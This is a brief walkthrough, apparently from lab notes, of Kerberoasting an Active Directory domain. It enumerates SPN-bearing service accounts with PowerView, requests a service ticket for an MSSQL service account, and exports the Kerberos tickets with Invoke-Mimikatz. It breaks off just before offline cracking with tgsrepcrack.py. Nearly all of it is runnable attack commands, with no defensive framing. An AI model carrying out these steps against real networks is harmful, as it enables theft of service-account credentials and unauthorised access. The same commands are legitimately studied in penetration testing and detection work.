. .\\powerview.ps1

let’s extract the users run as service accounts

Get-NetUser -SPN |select cn

now let’s extract the service principle names

Get-NetUser | Where-Object {$_.serviceprincipalname -ne $null} | select cn,serviceprincipalname

okay now let’s try to attack one of those service first and then script the others

attacking mssql_svc

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mssql_svc/mssqlserver.change.me"

now let’s confirm that we have the tgs

klist

as we see we have the ticket

now let’s use mimikatz to export all the tickets

. .\\Invoke-Mimikatz.ps1

Invoke-Mimikatz -Command '"kerberos::list /export"'

now let’s use tgsrepcrack.py